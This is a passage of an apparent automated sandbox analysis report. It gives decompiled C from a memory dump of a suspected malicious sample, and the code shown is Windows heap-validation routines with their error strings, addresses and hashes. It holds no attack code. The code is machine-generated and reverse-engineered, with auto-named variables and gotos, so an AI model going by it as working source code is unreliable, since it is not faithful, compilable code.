                                                        						_push( *((intOrPtr*)(_t332 + 0x30)));
                                                        						_push(_t332);
                                                        						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                                        						L122:
                                                        						E017EB150();
                                                        						L119:
                                                        						return 0;
                                                        					}
                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                        						_push("HEAP: ");
                                                        						E017EB150();
                                                        					} else {
                                                        						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        					}
                                                        					_push(_t416);
                                                        					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                                        					_push(_t332);
                                                        					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                                        					goto L122;
                                                        				} else {
                                                        					goto L1;
                                                        				}
                                                        				do {
                                                        					L1:
                                                        					 *_a16 = _t415;
                                                        					if( *(_t414 + 0x4c) != 0) {
                                                        						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                                        						 *_t415 = _t392;
                                                        						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                                        						_t424 = _t392 >> 0x18 - _t352;
                                                        						if(_t392 >> 0x18 != _t352) {
                                                        							_push(_t352);
                                                        							E0189FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                                        						}
                                                        					}
                                                        					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                                        						_t210 =  *[fs:0x30];
                                                        						__eflags =  *(_t210 + 0xc);
                                                        						if( *(_t210 + 0xc) == 0) {
                                                        							_push("HEAP: ");
                                                        							E017EB150();
                                                        						} else {
                                                        							E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        						}
                                                        						_push(_v8 & 0x0000ffff);
                                                        						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                                        						__eflags = _t340;
                                                        						_push(_t340);
                                                        						E017EB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                                        						L117:
                                                        						__eflags =  *(_t414 + 0x4c);
                                                        						if( *(_t414 + 0x4c) != 0) {
                                                        							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                        							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                        							__eflags =  *_t415;
                                                        						}
                                                        						goto L119;
                                                        					}
                                                        					_t225 =  *_t415 & 0x0000ffff;
                                                        					_t390 =  *(_t415 + 2);
                                                        					_t342 = _t225;
                                                        					_v8 = _t342;
                                                        					_v20 = _t342;
                                                        					_v28 = _t225 << 3;
                                                        					if((_t390 & 0x00000001) == 0) {
                                                        						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                                        						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                                        						__eflags = _t344 & 0x00000001;
                                                        						if((_t344 & 0x00000001) == 0) {
                                                        							L66:
                                                        							_t345 = _a12;
                                                        							 *_a8 =  *_a8 + 1;
                                                        							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                                        							__eflags =  *_t345;
                                                        							L67:
                                                        							_t231 =  *(_t415 + 6);
                                                        							if(_t231 == 0) {
                                                        								_t346 = _t414;
                                                        							} else {
                                                        								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                                        							}
                                                        							if(_t346 != _t332) {
                                                        								_t232 =  *[fs:0x30];
                                                        								__eflags =  *(_t232 + 0xc);
                                                        								if( *(_t232 + 0xc) == 0) {
                                                        									_push("HEAP: ");
                                                        									E017EB150();
                                                        								} else {
                                                        									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        								}
                                                        								_push( *(_t415 + 6) & 0x000000ff);
                                                        								_push(_t415);
                                                        								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                                        								goto L95;
                                                        							} else {
                                                        								if( *((char*)(_t415 + 7)) != 3) {
                                                        									__eflags =  *(_t414 + 0x4c);
                                                        									if( *(_t414 + 0x4c) != 0) {
                                                        										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                        										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                        										__eflags =  *_t415;
                                                        									}
                                                        									_t415 = _t415 + _v28;
                                                        									__eflags = _t415;
                                                        									goto L86;
                                                        								}
                                                        								_t245 =  *(_t415 + 0x1c);
                                                        								if(_t245 == 0) {
                                                        									_t395 =  *_t415 & 0x0000ffff;
                                                        									_v6 = _t395 >> 8;
                                                        									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                                        									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                        										__eflags =  *(_t414 + 0x4c);
                                                        										if( *(_t414 + 0x4c) != 0) {
                                                        											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                                        											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                        											__eflags =  *_t415;
                                                        										}
                                                        										goto L107;
                                                        									}
                                                        									_t249 =  *[fs:0x30];
                                                        									__eflags =  *(_t249 + 0xc);
                                                        									if( *(_t249 + 0xc) == 0) {
                                                        										_push("HEAP: ");
                                                        										E017EB150();
                                                        									} else {
                                                        										E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        									}
                                                        									_push( *((intOrPtr*)(_t332 + 0x28)));
                                                        									_push(_t415);
                                                        									_push("Heap block at %p is not last block in segment (%p)\n");
                                                        									L95:
                                                        									E017EB150();
                                                        									goto L117;
                                                        								}
                                                        								_v12 = _v12 + 1;
                                                        								_v16 = _v16 + (_t245 >> 0xc);
                                                        								if( *(_t414 + 0x4c) != 0) {
                                                        									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                        									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                        								}
                                                        								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                                        								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                        									L82:
                                                        									_v8 = _v8 & 0x00000000;
                                                        									goto L86;
                                                        								} else {
                                                        									if( *(_t414 + 0x4c) != 0) {
                                                        										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                                        										 *_t415 = _t397;
                                                        										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                                        										_t442 = _t397 >> 0x18 - _t367;
                                                        										if(_t397 >> 0x18 != _t367) {
                                                        											_push(_t367);
                                                        											E0189FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                                        										}
                                                        									}
                                                        									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                                        										_t259 =  *[fs:0x30];
                                                        										__eflags =  *(_t259 + 0xc);
                                                        										if( *(_t259 + 0xc) == 0) {
                                                        											_push("HEAP: ");
                                                        											E017EB150();
                                                        										} else {
                                                        											E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        										}
                                                        										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                                        										_push(_t415);
                                                        										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                                        										goto L95;
                                                        									} else {
                                                        										if( *(_t414 + 0x4c) != 0) {
                                                        											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                        											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                        										}
                                                        										goto L82;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						_t281 = _v28 + 0xfffffff0;
                                                        						_v24 = _t281;
                                                        						__eflags = _t390 & 0x00000002;
                                                        						if((_t390 & 0x00000002) != 0) {
                                                        							__eflags = _t281 - 4;
                                                        							if(_t281 > 4) {
                                                        								_t281 = _t281 - 4;
                                                        								__eflags = _t281;
                                                        								_v24 = _t281;
                                                        							}
                                                        						}
                                                        						__eflags = _t390 & 0x00000008;
                                                        						if((_t390 & 0x00000008) == 0) {
                                                        							_t102 = _t415 + 0x10; // -8
                                                        							_t283 = E0183D540(_t102, _t281, 0xfeeefeee);
                                                        							_v20 = _t283;
                                                        							__eflags = _t283 - _v24;
                                                        							if(_t283 != _v24) {
                                                        								_t284 =  *[fs:0x30];
                                                        								__eflags =  *(_t284 + 0xc);
                                                        								if( *(_t284 + 0xc) == 0) {
                                                        									_push("HEAP: ");
                                                        									E017EB150();
                                                        								} else {
                                                        									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        								}
                                                        								_t288 = _v20 + 8 + _t415;
                                                        								__eflags = _t288;
                                                        								_push(_t288);
                                                        								_push(_t415);
                                                        								_push("Free Heap block %p modified at %p after it was freed\n");
                                                        								goto L95;
                                                        							}
                                                        							goto L66;
                                                        						} else {
                                                        							_t374 =  *(_t415 + 8);
                                                        							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                                        							_v24 = _t374;
                                                        							_v28 = _t400;
                                                        							_t294 =  *(_t374 + 4);
                                                        							__eflags =  *_t400 - _t294;
                                                        							if( *_t400 != _t294) {
                                                        								L64:
                                                        								_push(_t374);
                                                        								_push( *_t400);
                                                        								_t101 = _t415 + 8; // -16
                                                        								E018AA80D(_t414, 0xd, _t101, _t294);
                                                        								goto L86;
                                                        							}
                                                        							_t56 = _t415 + 8; // -16
                                                        							__eflags =  *_t400 - _t56;
                                                        							_t374 = _v24;
                                                        							if( *_t400 != _t56) {
                                                        								goto L64;
                                                        							}
                                                        							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                                        							_t402 =  *(_t414 + 0xb4);
                                                        							__eflags = _t402;
                                                        							if(_t402 == 0) {
                                                        								L35:
                                                        								_t298 = _v28;
                                                        								 *_t298 = _t374;
                                                        								 *(_t374 + 4) = _t298;
                                                        								__eflags =  *(_t415 + 2) & 0x00000008;
                                                        								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                                        									L39:
                                                        									_t377 =  *_t415 & 0x0000ffff;
                                                        									_t299 = _t414 + 0xc0;
                                                        									_v28 =  *_t415 & 0x0000ffff;
                                                        									 *(_t415 + 2) = 0;
                                                        									 *((char*)(_t415 + 7)) = 0;
                                                        									__eflags =  *(_t414 + 0xb4);
                                                        									if( *(_t414 + 0xb4) == 0) {
                                                        										_t378 =  *_t299;
                                                        									} else {
                                                        										_t378 = E0180E12C(_t414, _t377);
                                                        										_t299 = _t414 + 0xc0;
                                                        									}
                                                        									__eflags = _t299 - _t378;
                                                        									if(_t299 == _t378) {
                                                        										L51:
                                                        										_t300 =  *((intOrPtr*)(_t378 + 4));
                                                        										__eflags =  *_t300 - _t378;
                                                        										if( *_t300 != _t378) {
                                                        											_push(_t378);
                                                        											_push( *_t300);
                                                        											__eflags = 0;
                                                        											E018AA80D(0, 0xd, _t378, 0);
                                                        										} else {
                                                        											_t87 = _t415 + 8; // -16
                                                        											_t406 = _t87;
                                                        											 *_t406 = _t378;
                                                        											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                                        											 *_t300 = _t406;
                                                        											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                                        										}
                                                        										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                                        										_t405 =  *(_t414 + 0xb4);
                                                        										__eflags = _t405;
                                                        										if(_t405 == 0) {
                                                        											L61:
                                                        											__eflags =  *(_t414 + 0x4c);
                                                        											if(__eflags != 0) {
                                                        												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                        												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                        											}
                                                        											goto L86;
                                                        										} else {
                                                        											_t380 =  *_t415 & 0x0000ffff;
                                                        											while(1) {
                                                        												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                                        												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                                        													break;
                                                        												}
                                                        												_t307 =  *_t405;
                                                        												__eflags = _t307;
                                                        												if(_t307 == 0) {
                                                        													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                                        													L60:
                                                        													_t94 = _t415 + 8; // -16
                                                        													E0180E4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                                        													goto L61;
                                                        												}
                                                        												_t405 = _t307;
                                                        											}
                                                        											_t309 = _t380;
                                                        											goto L60;
                                                        										}
                                                        									} else {
                                                        										_t407 =  *(_t414 + 0x4c);
                                                        										while(1) {
                                                        											__eflags = _t407;
                                                        											if(_t407 == 0) {
                                                        												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                                        											} else {
                                                        												_t315 =  *(_t378 - 8);
                                                        												_t407 =  *(_t414 + 0x4c);
                                                        												__eflags = _t315 & _t407;
                                                        												if((_t315 & _t407) != 0) {
                                                        													_t315 = _t315 ^  *(_t414 + 0x50);
                                                        													__eflags = _t315;
                                                        												}
                                                        												_t312 = _t315 & 0x0000ffff;
                                                        											}
                                                        											__eflags = _v28 - (_t312 & 0x0000ffff);
                                                        											if(_v28 <= (_t312 & 0x0000ffff)) {
                                                        												goto L51;
                                                        											}
                                                        											_t378 =  *_t378;
                                                        											__eflags = _t414 + 0xc0 - _t378;
                                                        											if(_t414 + 0xc0 != _t378) {
                                                        												continue;
                                                        											}
                                                        											goto L51;
                                                        										}
                                                        										goto L51;
                                                        									}
                                                        								}
                                                        								_t317 = E0180A229(_t414, _t415);
                                                        								__eflags = _t317;
                                                        								if(_t317 != 0) {
                                                        									goto L39;
                                                        								}
                                                        								E0180A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                                        								goto L86;
                                                        							}
                                                        							_t385 =  *_t415 & 0x0000ffff;
                                                        							while(1) {
                                                        								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                                        								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                                        									break;
                                                        								}
                                                        								_t320 =  *_t402;
                                                        								__eflags = _t320;
                                                        								if(_t320 == 0) {
                                                        									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                                        									L34:
                                                        									_t63 = _t415 + 8; // -16
                                                        									E0180BC04(_t414, _t402, 1, _t63, _t322, _t385);
                                                        									_t374 = _v24;
                                                        									goto L35;
                                                        								}
                                                        								_t402 = _t320;
                                                        							}
                                                        							_t322 = _t385;
                                                        							goto L34;
                                                        						}
                                                        					}
                                                        					if(_a20 == 0) {
                                                        						L18:
                                                        						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                                        							goto L67;
                                                        						}
                                                        						if(E018923E3(_t414, _t415) == 0) {
                                                        							goto L117;
                                                        						}
                                                        						goto L67;
                                                        					} else {
                                                        						if((_t390 & 0x00000002) == 0) {
                                                        							_t326 =  *(_t415 + 3) & 0x000000ff;
                                                        						} else {
                                                        							_t328 = E017E1F5B(_t415);
                                                        							_t342 = _v20;
                                                        							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                                        						}
                                                        						_t429 = _t326;
                                                        						if(_t429 == 0) {
                                                        							goto L18;
                                                        						}
                                                        						if(_t429 >= 0) {
                                                        							__eflags = _t326 & 0x00000800;
                                                        							if(__eflags != 0) {
                                                        								goto L18;
                                                        							}
                                                        							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                                        							if(__eflags >= 0) {
                                                        								goto L18;
                                                        							}
                                                        							_t412 = _a20;
                                                        							_t327 = _t326 & 0x0000ffff;
                                                        							L17:
                                                        							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                                        							goto L18;
                                                        						}
                                                        						_t327 = _t326 & 0x00007fff;
                                                        						if(_t327 >= 0x81) {
                                                        							goto L18;
                                                        						}
                                                        						_t412 = _a24;
                                                        						goto L17;
                                                        					}
                                                        					L86:
                                                        				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                                        				_t189 = _v12;
                                                        				goto L88;
                                                        			}
                                                        0x018a5051
                                                        0x018a5066
                                                        0x018a506b
                                                        0x018a5083
                                                        0x018a5088
                                                        0x018a5088
                                                        0x018a508a
                                                        0x018a5091
                                                        0x018a5099
                                                        0x018a5099
                                                        0x018a509d
                                                        0x018a50a7
                                                        0x018a50ad
                                                        0x018a50ad
                                                        0x018a50ad
                                                        0x00000000
                                                        0x018a509d
                                                        0x018a4b58
                                                        0x018a4b5b
                                                        0x018a4b5e
                                                        0x018a4b63
                                                        0x018a4b66
                                                        0x018a4b69
                                                        0x018a4b6f
                                                        0x018a4be4
                                                        0x018a4bf0
                                                        0x018a4bf2
                                                        0x018a4bf5
                                                        0x018a4dc3
                                                        0x018a4dc6
                                                        0x018a4dc9
                                                        0x018a4dce
                                                        0x018a4dce
                                                        0x018a4dd0
                                                        0x018a4dd0
                                                        0x018a4dd5
                                                        0x018a4def
                                                        0x018a4dd7
                                                        0x018a4de7
                                                        0x018a4de7
                                                        0x018a4df3
                                                        0x018a5001
                                                        0x018a5007
                                                        0x018a500b
                                                        0x018a502a
                                                        0x018a502f
                                                        0x018a500d
                                                        0x018a5022
                                                        0x018a5027
                                                        0x018a5039
                                                        0x018a503a
                                                        0x018a503b
                                                        0x00000000
                                                        0x018a4df9
                                                        0x018a4dfd
                                                        0x018a4e90
                                                        0x018a4e94
                                                        0x018a4e9e
                                                        0x018a4ea4
                                                        0x018a4ea4
                                                        0x018a4ea4
                                                        0x018a4ea6
                                                        0x018a4ea6
                                                        0x00000000
                                                        0x018a4ea6
                                                        0x018a4e03
                                                        0x018a4e08
                                                        0x018a4f88
                                                        0x018a4f92
                                                        0x018a4f99
                                                        0x018a4f9c
                                                        0x018a4fe0
                                                        0x018a4fe4
                                                        0x018a4fee
                                                        0x018a4ff4
                                                        0x018a4ff4
                                                        0x018a4ff4
                                                        0x00000000
                                                        0x018a4fe4
                                                        0x018a4f9e
                                                        0x018a4fa4
                                                        0x018a4fa8
                                                        0x018a4fc7
                                                        0x018a4fcc
                                                        0x018a4faa
                                                        0x018a4fbf
                                                        0x018a4fc4
                                                        0x018a4fd2
                                                        0x018a4fd5
                                                        0x018a4fd6
                                                        0x018a4f34
                                                        0x018a4f34
                                                        0x00000000
                                                        0x018a4f39
                                                        0x018a4e0e
                                                        0x018a4e14
                                                        0x018a4e1b
                                                        0x018a4e25
                                                        0x018a4e2b
                                                        0x018a4e2b
                                                        0x018a4e33
                                                        0x018a4e38
                                                        0x018a4e8a
                                                        0x018a4e8a
                                                        0x00000000
                                                        0x018a4e3a
                                                        0x018a4e3e
                                                        0x018a4e43
                                                        0x018a4e47
                                                        0x018a4e53
                                                        0x018a4e58
                                                        0x018a4e5a
                                                        0x018a4e5c
                                                        0x018a4e61
                                                        0x018a4e61
                                                        0x018a4e5a
                                                        0x018a4e6e
                                                        0x018a4f41
                                                        0x018a4f47
                                                        0x018a4f4b
                                                        0x018a4f6a
                                                        0x018a4f6f
                                                        0x018a4f4d
                                                        0x018a4f62
                                                        0x018a4f67
                                                        0x018a4f7f
                                                        0x018a4f80
                                                        0x018a4f81
                                                        0x00000000
                                                        0x018a4e74
                                                        0x018a4e78
                                                        0x018a4e82
                                                        0x018a4e88
                                                        0x018a4e88
                                                        0x00000000
                                                        0x018a4e78
                                                        0x018a4e6e
                                                        0x018a4e38
                                                        0x018a4df3
                                                        0x018a4bfe
                                                        0x018a4c01
                                                        0x018a4c04
                                                        0x018a4c07
                                                        0x018a4c09
                                                        0x018a4c0c
                                                        0x018a4c0e
                                                        0x018a4c0e
                                                        0x018a4c11
                                                        0x018a4c11
                                                        0x018a4c0c
                                                        0x018a4c14
                                                        0x018a4c17
                                                        0x018a4dae
                                                        0x018a4db2
                                                        0x018a4db7
                                                        0x018a4dba
                                                        0x018a4dbd
                                                        0x018a4ef1
                                                        0x018a4ef7
                                                        0x018a4efb
                                                        0x018a4f1a
                                                        0x018a4f1f
                                                        0x018a4efd
                                                        0x018a4f12
                                                        0x018a4f17
                                                        0x018a4f2b
                                                        0x018a4f2b
                                                        0x018a4f2d
                                                        0x018a4f2e
                                                        0x018a4f2f
                                                        0x00000000
                                                        0x018a4f2f
                                                        0x00000000
                                                        0x018a4c1d
                                                        0x018a4c1d
                                                        0x018a4c20
                                                        0x018a4c23
                                                        0x018a4c26
                                                        0x018a4c29
                                                        0x018a4c2c
                                                        0x018a4c2e
                                                        0x018a4d91
                                                        0x018a4d91
                                                        0x018a4d92
                                                        0x018a4d97
                                                        0x018a4d9e
                                                        0x00000000
                                                        0x018a4d9e
                                                        0x018a4c34
                                                        0x018a4c37
                                                        0x018a4c39
                                                        0x018a4c3c
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4c45
                                                        0x018a4c48
                                                        0x018a4c4e
                                                        0x018a4c50
                                                        0x018a4c78
                                                        0x018a4c78
                                                        0x018a4c7b
                                                        0x018a4c7d
                                                        0x018a4c80
                                                        0x018a4c84
                                                        0x018a4cad
                                                        0x018a4cad
                                                        0x018a4cb0
                                                        0x018a4cb8
                                                        0x018a4cbb
                                                        0x018a4cbe
                                                        0x018a4cc1
                                                        0x018a4cc7
                                                        0x018a4cdc
                                                        0x018a4cc9
                                                        0x018a4cd2
                                                        0x018a4cd4
                                                        0x018a4cd4
                                                        0x018a4cde
                                                        0x018a4ce0
                                                        0x018a4d13
                                                        0x018a4d13
                                                        0x018a4d16
                                                        0x018a4d18
                                                        0x018a4d29
                                                        0x018a4d2a
                                                        0x018a4d2c
                                                        0x018a4d34
                                                        0x018a4d1a
                                                        0x018a4d1a
                                                        0x018a4d1a
                                                        0x018a4d1d
                                                        0x018a4d1f
                                                        0x018a4d22
                                                        0x018a4d24
                                                        0x018a4d24
                                                        0x018a4d3c
                                                        0x018a4d3f
                                                        0x018a4d45
                                                        0x018a4d47
                                                        0x018a4d6c
                                                        0x018a4d6c
                                                        0x018a4d70
                                                        0x018a4d7e
                                                        0x018a4d84
                                                        0x018a4d84
                                                        0x00000000
                                                        0x018a4d49
                                                        0x018a4d49
                                                        0x018a4d56
                                                        0x018a4d56
                                                        0x018a4d59
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4d4e
                                                        0x018a4d50
                                                        0x018a4d52
                                                        0x018a4d8e
                                                        0x018a4d5d
                                                        0x018a4d5f
                                                        0x018a4d67
                                                        0x00000000
                                                        0x018a4d67
                                                        0x018a4d54
                                                        0x018a4d54
                                                        0x018a4d5b
                                                        0x00000000
                                                        0x018a4d5b
                                                        0x018a4ce2
                                                        0x018a4ce2
                                                        0x018a4ce5
                                                        0x018a4ce5
                                                        0x018a4ce7
                                                        0x018a4cfb
                                                        0x018a4ce9
                                                        0x018a4ce9
                                                        0x018a4cec
                                                        0x018a4cef
                                                        0x018a4cf1
                                                        0x018a4cf3
                                                        0x018a4cf3
                                                        0x018a4cf3
                                                        0x018a4cf6
                                                        0x018a4cf6
                                                        0x018a4d02
                                                        0x018a4d05
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4d07
                                                        0x018a4d0f
                                                        0x018a4d11
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4d11
                                                        0x00000000
                                                        0x018a4ce5
                                                        0x018a4ce0
                                                        0x018a4c8a
                                                        0x018a4c8f
                                                        0x018a4c91
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4c9d
                                                        0x00000000
                                                        0x018a4c9d
                                                        0x018a4c52
                                                        0x018a4c5f
                                                        0x018a4c5f
                                                        0x018a4c62
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4c57
                                                        0x018a4c59
                                                        0x018a4c5b
                                                        0x018a4caa
                                                        0x018a4c66
                                                        0x018a4c68
                                                        0x018a4c70
                                                        0x018a4c75
                                                        0x00000000
                                                        0x018a4c75
                                                        0x018a4c5d
                                                        0x018a4c5d
                                                        0x018a4c64
                                                        0x00000000
                                                        0x018a4c64
                                                        0x018a4c17
                                                        0x018a4b75
                                                        0x018a4bc4
                                                        0x018a4bc8
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4bd9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4b77
                                                        0x018a4b7a
                                                        0x018a4b8c
                                                        0x018a4b7c
                                                        0x018a4b7e
                                                        0x018a4b83
                                                        0x018a4b86
                                                        0x018a4b86
                                                        0x018a4b90
                                                        0x018a4b93
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4b95
                                                        0x018a4bab
                                                        0x018a4bb0
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4bb2
                                                        0x018a4bb9
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4bbb
                                                        0x018a4bbe
                                                        0x018a4bc1
                                                        0x018a4bc1
                                                        0x00000000
                                                        0x018a4bc1
                                                        0x018a4b97
                                                        0x018a4ba4
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4ba6
                                                        0x00000000
                                                        0x018a4ba6
                                                        0x018a4ea9
                                                        0x018a4ea9
                                                        0x018a4eb2
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                        • API String ID: 0-3591852110
                                                        • Opcode ID: 725a5375e651b619603a19374bcee7d34cf1074faefad30b7f2f47cae5a947bf
                                                        • Instruction ID: 726996c905b350e5a0f767dc69e4c5cbd1550f77d69fa0cc6dd0a76803dbf2f5
                                                        • Opcode Fuzzy Hash: 725a5375e651b619603a19374bcee7d34cf1074faefad30b7f2f47cae5a947bf
                                                        • Instruction Fuzzy Hash: 8312F0302006469FEB25CF6DC498BBABBF1EF08714F58845DE586CB641D7B4EA81CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 56%
                                                        			E018A4496(signed int* __ecx, void* __edx) {
                                                        				signed int _v5;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed char _v24;
                                                        				signed int* _v28;
                                                        				char _v32;
                                                        				signed int* _v36;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				void* __ebp;
                                                        				void* _t150;
                                                        				intOrPtr _t151;
                                                        				signed char _t156;
                                                        				intOrPtr _t157;
                                                        				unsigned int _t169;
                                                        				intOrPtr _t170;
                                                        				signed int* _t183;
                                                        				signed char _t184;
                                                        				intOrPtr _t191;
                                                        				signed int _t201;
                                                        				intOrPtr _t203;
                                                        				intOrPtr _t212;
                                                        				intOrPtr _t220;
                                                        				signed int _t230;
                                                        				signed int _t241;
                                                        				signed int _t244;
                                                        				void* _t259;
                                                        				signed int _t260;
                                                        				signed int* _t261;
                                                        				intOrPtr* _t262;
                                                        				signed int _t263;
                                                        				signed int* _t264;
                                                        				signed int _t267;
                                                        				signed int* _t268;
                                                        				void* _t270;
                                                        				void* _t281;
                                                        				signed short _t285;
                                                        				signed short _t289;
                                                        				signed int _t291;
                                                        				signed int _t298;
                                                        				signed char _t303;
                                                        				signed char _t308;
                                                        				signed int _t314;
                                                        				intOrPtr _t317;
                                                        				unsigned int _t319;
                                                        				signed int* _t325;
                                                        				signed int _t326;
                                                        				signed int _t327;
                                                        				intOrPtr _t328;
                                                        				signed int _t329;
                                                        				signed int _t330;
                                                        				signed int* _t331;
                                                        				signed int _t332;
                                                        				signed int _t350;
                                                        
                                                        				_t259 = __edx;
                                                        				_t331 = __ecx;
                                                        				_v28 = __ecx;
                                                        				_v20 = 0;
                                                        				_v12 = 0;
                                                        				_t150 = E018A49A4(__ecx);
                                                        				_t267 = 1;
                                                        				if(_t150 == 0) {
                                                        					L61:
                                                        					_t151 =  *[fs:0x30];
                                                        					__eflags =  *((char*)(_t151 + 2));
                                                        					if( *((char*)(_t151 + 2)) != 0) {
                                                        						 *0x18d6378 = _t267;
                                                        						asm("int3");
                                                        						 *0x18d6378 = 0;
                                                        					}
                                                        					__eflags = _v12;
                                                        					if(_v12 != 0) {
                                                        						_t105 =  &_v16;
                                                        						 *_t105 = _v16 & 0x00000000;
                                                        						__eflags =  *_t105;
                                                        						E0181174B( &_v12,  &_v16, 0x8000);
                                                        					}
                                                        					L65:
                                                        					__eflags = 0;
                                                        					return 0;
                                                        				}
                                                        				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                                        					_t268 =  &(_t331[0x30]);
                                                        					_v32 = 0;
                                                        					_t260 =  *_t268;
                                                        					_t308 = 0;
                                                        					_v24 = 0;
                                                        					while(_t268 != _t260) {
                                                        						_t260 =  *_t260;
                                                        						_v16 =  *_t325 & 0x0000ffff;
                                                        						_t156 = _t325[0];
